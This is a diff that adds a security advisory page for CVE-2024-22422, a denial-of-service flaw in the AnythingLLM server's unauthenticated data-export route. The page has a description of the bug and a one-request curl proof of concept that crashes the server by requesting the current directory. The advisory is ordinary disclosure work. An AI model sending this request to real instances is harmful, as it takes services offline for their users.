|
| 1 | +--- |
| 2 | +description: CVE-2024-22422, HIGH, An API route (file export) can allow an unauthenticated attacker to crash the AnythingLLM server resulting in a denial of service attack. |
| 3 | +title: AnythingLLM Unhandled Exception DoS |
| 4 | +date_published: "2024-01-22" |
| 5 | +last_updated: "2024-01-22" |
| 6 | +xray_id: |
| 7 | +vul_id: CVE-2024-22422 |
| 8 | +cvss: 7.5 |
| 9 | +severity: high |
| 10 | +discovered_by: Natan Nehorai |
| 11 | +type: vulnerability |
| 12 | + |
| 13 | +--- |
| 14 | + |
| 15 | +## Summary |
| 16 | + |
| 17 | +An API route (file export) can allow an unauthenticated attacker to crash the AnythingLLM server resulting in a denial of service attack. |
| 18 | + |
| 19 | +## Component |
| 20 | + |
| 21 | +[AnythingLLM](https://github.com/Mintplex-Labs/anything-llm) |
| 22 | + |
| 23 | + |
| 24 | + |
| 25 | +## Affected versions |
| 26 | + |
| 27 | +No version tags. Fixed in commit [08d33cf](https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2) |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | +## Description |
| 32 | + |
| 33 | +The “data-export” endpoint is used to export files using the filename parameter as user input. |
| 34 | + |
| 35 | +The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. |
| 36 | + |
| 37 | +An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. |
| 38 | + |
| 39 | +Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. |
| 40 | + |
| 41 | + |
| 42 | + |
| 43 | +## PoC |
| 44 | + |
| 45 | +As the API endpoint is unauthenticated there is only a need for a single HTTP request to crash the server: |
| 46 | + |
| 47 | +```shell |
| 48 | +curl -i -s -k -X $'GET' \ |
| 49 | +-H $'Host: localhost:3001' \ |
| 50 | +-H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' \ |
| 51 | +-H $'Accept: */*' \ |
| 52 | +-H $'Accept-Language: en-US,en;q=0.5' \ |
| 53 | +-H $'Accept-Encoding: gzip, deflate' \ |
| 54 | +-H $'Connection: close' \ |
| 55 | +$'http://localhost:3001/api/system/data-exports/.' |
| 56 | +``` |
| 57 | + |
| 58 | + |
| 59 | + |
| 60 | +## Vulnerability Mitigations |
| 61 | + |
| 62 | +No mitigations are supplied for this issue |
| 63 | + |
| 64 | + |
| 65 | + |
| 66 | +## References |
| 67 | + |
| 68 | +[Advisory](https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q) |
| 69 | + |
| 70 | +[Fix commit](https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2) |
0 commit comments